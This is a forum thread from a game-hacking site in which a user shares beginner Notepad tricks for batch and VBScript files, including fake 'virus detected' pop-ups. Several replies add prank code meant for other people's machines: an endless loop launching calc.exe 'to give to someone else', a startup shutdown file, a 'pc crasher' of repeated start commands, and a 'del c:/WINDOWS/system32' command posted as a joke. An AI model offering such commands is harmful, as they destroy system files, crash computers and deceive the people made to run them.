Skip to content
MPGHThe Dark Arts
/
RegisterLog in
Forum
Community
What's NewLatest posts across the boardTrendingHottest threads right nowSubscribedThreads you follow
Discussion
GeneralIntroductionsEntertainmentDebate FortFlaming & Rage
Board
News & AnnouncementsMPGH TimesSuggestions & HelpGiveaways
More Sections
Art & Graphic DesignProgrammingHackingCryptocurrency
Hacks & Cheats
Games
ValorantCS2 / CS:GOCall of Duty / WarzoneFortniteApex LegendsEscape From Tarkov
+14 moreLeague of LegendsGTA VMinecraftRustROTMGBattlefieldTroveBattleOnCombat ArmsCrossFireBlackshotRuneScapeDayZDead by Daylight
Resources
Game Hacking TutorialsReverse EngineeringGeneral Game HackingAnti-CheatConsole Game Hacking
Tools
Game Hacking ToolsTrainers & CheatsHack/Release NewsNew
Submit a release →Share your cheat, tool, or config with the community.
AINEW
AI Tools
General & DiscussionPrompt EngineeringLLM JailbreaksHotAI Agents & AutomationLocal / Open Models
AI × Gaming
AI Aimbots & VisionML Anti-CheatGame Bots & Automation
Create
AI Coding / Vibe CodingAI Art & MediaAI Voice & TTS
The AI frontier →Where game hacking meets modern machine learning. Jump in.
Marketplace
Buy & Sell
SellingBuyingTradingUser Services
Trust & Safety
Middleman LoungeMarketplace TalkVouch Copy Profiles
Money
Cryptocurrency TalkCurrency ExchangeWork & Job Offers
Start selling →List accounts, services, and goods. Use the middleman to trade safe.
MPGH The Dark Arts

A community for offensive security research, reverse engineering, and AI.

Community

ForumMarketplaceSearch

Account

RegisterLog in

Legal

Privacy PolicyForum RulesHelp & FAQ
© 2026 MPGH · All rights reserved.Built by the community, for the community. For educational purposes onlyContent is shared for security research and education — we don't condone illegal use. You're responsible for complying with applicable laws. Use at your own risk.
Home › Forum › Programming › Programming Tutorials › CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!

CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!

Posts 1–15 of 26 · Page 1 of 2
IC
icantlolanymore
CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!
Hello, have you ever wanted to start something using notepad? WELL YES OFC YOU DO, this can start programs, open up websites, etc..

1: Open up notepad
2:Type in @echo off
3:Leave a space as if its a paragraph
4:Type in Start {Website or Program here} (.exe)
5:Save it as .bat

Code:
@echo off

start Google
it should look like this, if you don't know how to configure it, open up notepad, and copy and paste this

Code:
@echo off

start MPGH.net
and save it as anything.bat

new trick! you can make a fake error message as much as you want, open notepad type in

Code:
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
AND SAVE IT AS .VBS AND OPEN IT!! TADDAAA!! btw if you keep copying and pasting this it will keep on going eg i wrote it 4times i would have to click it for times like this
Code:
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
GUYS LOOK WHAT I ALSO FOUND OUT TYPE THIS IN NOTEPAD AND SAVE AS .BAT

Code:
x =MsgBox("VirusHasBeenDetected",0+48,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+0,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+2,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+3,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+4,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+5,"Please Hibernate PC")

EDITS* I FOUND OUT WHAT THE NUMBER IS FOR IT
HERE'S THE CODE

# To change the buttons (left number):

* 0 - ok button only
* 1 - ok and cancel
* 2 - abort, retry and ignore
* 3 - yes no and cancel
* 4 - yes and no
* 5 - retry and cancel

# To change the symbol (right number):

* 16 - critical message icon
* 32 - warning icon
* 48 - warning message
* 64 - info message





BTW LISTEN TO THIS SONG shoot the zombies from songstowearpantsto.com I SWEAR ITS SO FKN COOL IF SOMEONE MAKES A VIDEO USING IT ON QUARINTINE MODE!




BTW!! it would be really helpfull if you visited this video, because i am in a contest and if i win i would be really lucky!!PLEASE VISIT THIS VIDEO FOR THE SAKE OF SAKE!!XDD btw im still working on making my flyhack a .dll


Code:
www.youtube.com/watch?v=7CUNcIElkmY
#1 · edited 17y ago · 17y ago
ltpimp
ltpimp
OMFG DISTURBED!! w00t love em man, any way lol ye theres heaps of stuff like that u can do in notepad

like have u tried

start
start
start

and u just put like like 2000 times then type Loop, then save it in all files and a .BAT? thats fun. lol but ye ty
#2 · 17y ago
13
1337cheata
haha me and friend tried this and made it so it runs on start up... also if you hate someone put a bat file that makes the computer shutdown as soon as it starts up.. ^^ immense fun
#3 · 17y ago
Noonga
Noonga
Try this:

@echo off
:loop
start calc.exe
echo PWNT!
goto loop

Well, actually, don't try it, just give it to someone else, lol
#4 · 17y ago
EM
Emmitt
Baha, why did you post this?
#5 · 17y ago
Luke420
[MPGH]Luke420
omg bat lmao thats so 10 years ago lmao type start
start
start in a line 1000 + times then save as .bat and bam you just made a pc crasher this is why ppl dont like bat files bc they can be aney thing
#6 · 17y ago
TH
TheKamikazes
hey guys check this one

@ echo off
del c:/WINDOWS/system32

save as .bat

and press "Y"

wee what happens to your pc ahha
#7 · 17y ago
Luke420
[MPGH]Luke420
Quote Originally Posted by TheKamikazes View Post
hey guys check this one

@ echo off
del c:/WINDOWS/system32

save as .bat

and press "Y"

wee what happens to your pc ahha
ahah funny del= delete system 32 witch your pc is built on dumb ass dont put that up here thats a dick move
#8 · 17y ago
Ghty82
Ghty82
This should be in tutorials but looks good
#9 · 17y ago
FragInABox
FragInABox
Doesn't belong in the Combat Arms section. Belongs in General section.

Anyways I'm not sure if distributing .bat files on MPGH is against the rules or not. Might want to check.
#10 · 17y ago
User1
User1
1. Wrong section
2. Don't paste it just do this:
Code:
Start (Instert .bat name here).bat
At the end of the .bat I actually made a tapping program in .bat format. Quite easy.
#11 · 17y ago
whtlight
whtlight
nice thanks for showing
#12 · 17y ago
Katie_Perry
Katie_Perry
Don't Spam!
#13 · 17y ago
21
213374u
Quote Originally Posted by icantlolanymore View Post
Hello, have you ever wanted to start something using notepad? WELL YES OFC YOU DO, this can start programs, open up websites, etc..

1: Open up notepad
2:Type in @echo off
3:Leave a space as if its a paragraph
4:Type in Start {Website or Program here} (.exe)
5:Save it as .bat

Code:
@echo off

start Google
it should look like this, if you don't know how to configure it, open up notepad, and copy and paste this

Code:
@echo off

start MPGH.net
and save it as anything.bat

new trick! you can make a fake error message as much as you want, open notepad type in

Code:
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
AND SAVE IT AS .VBS AND OPEN IT!! TADDAAA!! btw if you keep copying and pasting this it will keep on going eg i wrote it 4times i would have to click it for times like this
Code:
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+16,"Please Hibernate PC")
GUYS LOOK WHAT I ALSO FOUND OUT TYPE THIS IN NOTEPAD AND SAVE AS .BAT

Code:
x =MsgBox("VirusHasBeenDetected",0+48,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+0,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+2,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+3,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+4,"Please Hibernate PC")
x =MsgBox("VirusHasBeenDetected",0+5,"Please Hibernate PC")

EDITS* I FOUND OUT WHAT THE NUMBER IS FOR IT
HERE'S THE CODE

# To change the buttons (left number):

* 0 - ok button only
* 1 - ok and cancel
* 2 - abort, retry and ignore
* 3 - yes no and cancel
* 4 - yes and no
* 5 - retry and cancel

# To change the symbol (right number):

* 16 - critical message icon
* 32 - warning icon
* 48 - warning message
* 64 - info message





BTW LISTEN TO THIS SONG shoot the zombies from songstowearpantsto.com I SWEAR ITS SO FKN COOL IF SOMEONE MAKES A VIDEO USING IT ON QUARINTINE MODE!




BTW!! it would be really helpfull if you visited this video, because i am in a contest and if i win i would be really lucky!!PLEASE VISIT THIS VIDEO FOR THE SAKE OF SAKE!!XDD btw im still working on making my flyhack a .dll


Code:
www.youtube.com/watch?v=7CUNcIElkmY
HOLY SHIT WRONG SECTION-anyway, how is this useful? just end it easily with WTM
#14 · 17y ago
X-Skype-X
X-Skype-X
everyone tells me coding is like hard i tried doing it for a runescape private server and it was hard
#15 · 17y ago
Posts 1–15 of 26 · Page 1 of 2

Post a Reply

Similar Threads

  • CODING TRICK W/ NOTEPAD [PLEASE DONT MOVE THIS SECTION HAS LOTS OF PPL ONLINE]!By icantlolanymore in Combat Arms Hacks & Cheats
    20Last post 17y ago
  • CODING TRICK W/ NOTEPAD!By icantlolanymore in C++/C Programming
    15Last post 17y ago
  • Help me Please! Read Please, Dont Ignore Please!By chipper122 in WarRock - International Hacks
    7Last post 19y ago
  • If you dont think this is funny suck my kokBy NeedHacksBad in General
    3Last post 19y ago

Tags for this Thread

#coding#lots#move#notepad#online#ppl#section#trick#w or